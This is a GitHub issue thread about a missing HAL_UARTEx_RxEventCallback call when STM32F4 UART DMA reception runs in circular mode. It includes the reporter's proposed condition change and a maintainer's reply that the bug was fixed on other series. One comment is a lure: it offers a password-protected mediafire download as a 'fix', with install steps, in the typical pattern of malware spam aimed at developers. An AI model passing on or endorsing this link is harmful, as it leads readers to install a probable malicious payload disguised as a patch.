### ISSUE TITLE
an issue in using HAL_UARTEx_ReceiveToIdle_DMA

### ISSUE THREAD

**Issue by litesky** [STMicroelectronics/stm32f4xx_hal_driver#34]
**Describe the set-up**
STM32CubeF4 version: 1.28.0

**Describe the bug**
missing call 
 HAL_UARTEx_RxEventCallback in step 4.

**How To Reproduce**

Init uart rx dma in  **Circular** mode.

HAL_UARTEx_ReceiveToIdle_DMA(huart,  pData, 256);

_send first 128 byte_

1.DMA_IRQ -> UART_DMARxHalfCplt, _RxEventType = HAL_UART_RXEVENT_HT_ -> HAL_UARTEx_RxEventCallback -> return (OK)
2.HAL_UART_IRQHandler, _RxEventType = HAL_UART_RXEVENT_IDLE_ -> HAL_UARTEx_RxEventCallback -> return (OK)

_send next 128 byte_

3.DMA_IRQ -> UART_DMAReceiveCplt, RxEventType = HAL_UART_RXEVENT_TC -> HAL_UARTEx_RxEventCallback -> return (OK)
4.HAL_UART_IRQHandler -> return (Wrong)

**Additional context**
https://github.com/STMicroelectronics/stm32f4xx_hal_driver/blob/master/Src%2Fstm32f4xx_hal_uart.c#L2485-L2488
I think mcu call DMA cplt first, then call uart idle irq.

modify
https://github.com/STMicroelectronics/stm32f4xx_hal_driver/blob/master/Src%2Fstm32f4xx_hal_uart.c#L2491-L2491
to
          && (nb_remaining_rx_data <= huart->RxXferSize))
maybe ok. Then  **HAL_UARTEx_RxEventCallback** _Size_ is 0.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KRASTM** [comment]
Hello @litesky,

Thank you for the report.

In fact, this issue it's detected on other series and fixed, it's a matter of updating F4.  For the solution it was the adding of an else condition when `(nb_remaining_rx_data == huart->RxXferSize)`

With regards.

**Comment by KRASTM** [comment]
ST Internal Reference: 189585
